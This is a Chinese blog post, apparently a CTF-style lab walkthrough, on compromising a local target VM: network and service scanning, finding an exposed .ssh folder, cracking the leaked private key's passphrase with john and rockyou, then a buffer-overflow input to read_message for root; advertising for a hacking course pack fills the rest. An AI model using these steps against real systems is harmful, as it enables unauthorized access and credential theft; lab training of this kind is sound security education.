干货分享SSH密钥泄露&&提权&&溢出&&服务发现,黑客技术零基础入门到精通教程建议收藏!

于 2024-11-15 11:33:07 发布
阅读量815 收藏 15
点赞数 6
文章标签: ssh 服务发现 运维 网络安全 黑客技术 渗透测试 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxyxx12/article/details/143790774
版权

首先启动我们的靶机和KALI(需要靶机环境请看下方扫描免费获取哦)

在这里插入图片描述

首先在KALI输入ifconfig查看网段
在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术(网络安全)电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

此处为80网段

接着输入

netdiscover -r 192.168.80.1/24 <IP/子网掩码>

在这里插入图片描述

除去192.168.80.1网关和192.168.80.2我们对剩下的进行ping检测

在这里插入图片描述

192.168.80.254丢包

在这里插入图片描述

192.168.80.149存活

我们对192.168.80.149进行服务发现

nmap -sV 192.168.80.149

在这里插入图片描述

结果开放端口为22/80/31337,我们对31337端口进行渗透

在浏览器输入

http://192.168.80.149:31337

在这里插入图片描述

提示Not Found错误,推测存在隐藏页,我们使用dirb工具对网站目录进行FUZZ

在这里插入图片描述

得到以下路径

---- Scanning URL: http://192.168.80.149:31337/ ----
+ http://192.168.80.149:31337/.bash_history (CODE:200|SIZE:19)                    
+ http://192.168.80.149:31337/.bashrc (CODE:200|SIZE:3526)                        
+ http://192.168.80.149:31337/.profile (CODE:200|SIZE:675)                        
+ http://192.168.80.149:31337/.ssh (CODE:200|SIZE:43)                             
+ http://192.168.80.149:31337/robots.txt (CODE:200|SIZE:70)

我们先访问robots.txt(搜索引擎检索文件)

在这里插入图片描述

接着访问taxes,得到flag1

然后我们访问.ssh,发现泄露的私钥,我们保存下来

在这里插入图片描述

http://192.168.80.149:31337/.ssh/id_rs
http://192.168.80.149:31337/.ssh/authorized_keys

我们把私钥copy到KALI,使用ssh2john将id_rsa转换为可识别的信息

ssh2john id_rsa > 123

我们使用字典对转换后的信息进行破解

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules 123

在这里插入图片描述

得到密码starwars

我们打开authorized_keys,看到最后的ssh用户名simon

在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术(网络安全)电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

我们进行连接

ssh -i id_rsa simon@192.168.80.149

在这里插入图片描述

把刚刚破解的密码输进去

在这里插入图片描述

成功进入系统,然后我们cd到root目录
在这里插入图片描述

发现flag.txt但是没有权限打开,我们查看read_message.c文件

在这里插入图片描述

代码审计后发现可以进行溢出后提权

运行read_message后输入SimonAAAAAAAAAAAAAAA/bin/sh使其溢出后跳转至/bin/sh

在这里插入图片描述

成功提权,拿到flag3{das_bof_meister}

在这里插入图片描述

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值